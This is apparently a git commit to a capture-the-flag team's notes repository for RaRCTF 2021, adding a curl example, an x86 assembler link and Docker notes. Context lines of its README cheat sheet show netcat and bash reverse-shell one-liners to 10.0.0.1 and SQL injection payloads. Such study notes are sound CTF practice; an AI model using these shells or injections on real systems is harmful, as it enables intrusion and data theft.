Commit notes from RaRCTF 2021

Signed-off-by: Malfurious <m@lfurio.us>

3 files changed, 17 insertions, 0 deletions

diff --git a/README.txt b/README.txt
index 970854f..6dcf1b6 100644
--- a/README.txt
+++ b/README.txt
@@ -22,3 +22,4 @@ nc 10.0.0.1 1234 -e cmd.exe # Netcat reverse shell (Windows)
 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
 ' OR 1=1-- # SQL inject (pass)
 ' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
+curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request
diff --git a/docs/pwn/pwn-links.txt b/docs/pwn/pwn-links.txt
index ae39752..5c8e374 100644
--- a/docs/pwn/pwn-links.txt
+++ b/docs/pwn/pwn-links.txt
@@ -1,3 +1,4 @@
 https://opensource.com/article/21/6/linux-checksec
 https://trustfoundry.net/basic-rop-techniques-and-tricks/
 https://www.exploit-db.com/docs/english/28479-return-oriented-programming-(rop-ftw).pdf
+https://defuse.ca/online-x86-assembler.htm
diff --git a/docs/web/docker.txt b/docs/web/docker.txt
new file mode 100644
index 0000000..992b5b3
--- /dev/null
+++ b/docs/web/docker.txt
@@ -0,0 +1,15 @@
+# TODO: This whole doc
+
+docker run -p host:container
+        Run container with port forwarding
+
+docker run --rm -d --network host --name <something> <image-id>
+        --rm        Destroy container on exit
+        -d          Run detached (don't hijack terminal)
+        --net...    Use host's network (don't need port forward)
+
+docker exec -it
+        Get a shell in container
+
+
+I'm told docker-compose is just much simpler, try to use if possible.